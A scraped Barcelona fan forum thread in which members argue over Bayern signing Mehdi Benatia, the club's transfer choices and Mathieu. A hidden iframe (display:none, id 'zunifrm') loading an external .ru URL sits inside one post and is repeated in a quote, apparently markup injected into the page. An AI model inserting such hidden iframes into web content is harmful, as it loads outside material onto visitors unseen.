Mehdi Benatia

Cule4life

The Culest
Making your best midfielder feel unloved is poor management.

"Best midfielder"? Thats "debatable" to put in mildly. And not paying him insane wages is making him feel unloved? Isnt this one of the reasons we hate Madrid, them using the peoples money to overpay prima donna footballers like Cristiano?And they set an example that no one can bully them into having their own way however big their name might be. If he was paid the salary he demanded the dressing room would explode with everyone demanding a raise.

What if Suarez was paid more than Iniesta? Would you accept that?

F

Flavia

So much for "no big club sign him because Roma won't sell", according to the transfer experts of Barcaforum.

Bayern got the timing right, imo. Roma made the same mistake of fiorentina with cuadrado. Asked too much to see if anyone would pay. No one did, so now they had to sell for less. But I don't think Zubi pushed for Benatia, and Lucho probably didn't want him.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

JamDav1982

You're generalizing too much.

Look at me, I think Mathieu was a good deal and I am a supporter of him. Yet I would want to know why Benatia was not on barca shortlist. And don't tell me he doesn't fit Barcelona because I saw him playing and he's good enough to fit anywhere if we're only talking about skills.

Why was Benatia no on the 'short list' of PSG, Man City, Barcelona, Chelsea, Man Utd? Even Bayern earlier in the summer?

Either those teams did not rate him earlier in the summer or thought he was too expensive at the time.

L

linetty

You're generalizing too much.

Look at me, I think Mathieu was a good deal and I am a supporter of him. Yet I would want to know why Benatia was not on barca shortlist. And don't tell me he doesn't fit Barcelona because I saw him playing and he's good enough to fit anywhere if we're only talking about skills.
The coach havent asked for him. I don't know the details. END. But no, why shut up when you can throw shit around and take smile away from other member reading that faecal.

Ghostmaster

Danger Ahead
I want the board out, you don't even know how much, but I will not write several posts everyday to point their EVERY FREAKING mistake.

I mentally throw up if I read posts like 'THEY SIGNED FREAKING MATHIEU FOR 20M AND LORD MEHDI BENATIA WAS AVAILABLE FOR ONLY 10M MORE!!!!11111'

Then you probably shouldn't read this thread for at least a year :lol:

DonAK

President of FC Barcelona
Bayern got the timing right, imo. Roma made the same mistake of fiorentina with cuadrado. Asked too much to see if anyone would pay. No one did, so now they had to sell for less. But I don't think Zubi pushed for Benatia, and Lucho probably didn't want him.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

This. Roma trolled themselves. Benatia pushed for a transfer all the time and they had to give in for much less in the end. :lol:

JamDav1982

If Benatia turns out to be the great star a lot of people are prediciting then this one is on Lucho.

He is the one that is calling the shots transfer wise since he got here and the board have gone as far as they can to back him.

Andrew M

"Best midfielder"? Thats "debatable" to put in mildly. And not paying him insane wages is making him feel unloved? Isnt this one of the reasons we hate Madrid, them using the peoples money to overpay prima donna footballers like Cristiano?And they set an example that no one can bully them into having their own way however big their name might be. If he was paid the salary he demanded the dressing room would explode with everyone demanding a raise.

What if Suarez was paid more than Iniesta? Would you accept that?

Suarez has a different relationship to Barca at the moment. He has just joined so has little leverage to negotiate a bigger contract than our current stars. If he scores 30+ goals for 2 seasons he may get a pay rise.

Kroos is an excellent player and Bayern will miss him immeasurably.

Lomar1o

jeez, what's the big deal. i'm just as glad we didn't get benatia as we didn't get david luiz. while i think benatia would fit bayern i doubt he would've been better for us than for example mathieu is currently. he would be no better for us than brazilian dede for example. i'm sure most of us haven't even seen him play more than a few times, i myself thought he would be a good transfer and i had only seen a couple of his games, but then i saw more, and dude is 'meh' for barca at least. the only true defenders i want are either hummels or subotic. benatia, marquinhos, david luiz ain't shit. im glad we don't have them

Bertus

The coach havent asked for him. I don't know the details. END. But no, why shut up when you can throw shit around and take smile away from other member reading that faecal.

Listen, no one asks you to read this thread.

You want us to shut up because it annoys you that we think Barca missed a good opportunity to arguably sign a very good CB?

You know you can do like me and even use the Blacklist function of this forum. I put JamDav on it and can't read his sh*t anymore since when talking to me, he always does fallacies and talk about PSG instead of challenging my points. Now he can do offtopics alone.

It's better for the health trust me. Put all the names you dislike on your blacklist. Even I if you hate me, I could understand.

To my defense, I follow Benatia, and yeah I am sad. Double sad even because either PSG or Barcelona, they both snubbed him. I don't understand.

Luftstalag14

Culé de Celestial Empire
Come on everyone, I know exactly how you feel, but let's be sensible:

Are you having a meltdown because (1) we did not sign Benatia (and someone else did)? If so, why weren't you this upset as late as yesterday? Everyone knew we weren't going after him.

Or are you having a meltdown because (2) the extremely low price Bayern paid to get him? If so, it is not our money to spend, why should you be upset?

Bayern knows their business and drives a hard bargain. Our board truly is no match in this regard. Other than that, what is there to be so upset about? Yeah we spent 35m on two CBs who is either old or injured-prone. But let's give them the opportunity to demonstrate their value before we give out our verdict. All is not lost for us!

Personally, Bayern is one of the clubs that I dislike the most, so I am not happy that they are strengthened. But one world-class CB alone does not win games for them.

Home of Barca Fans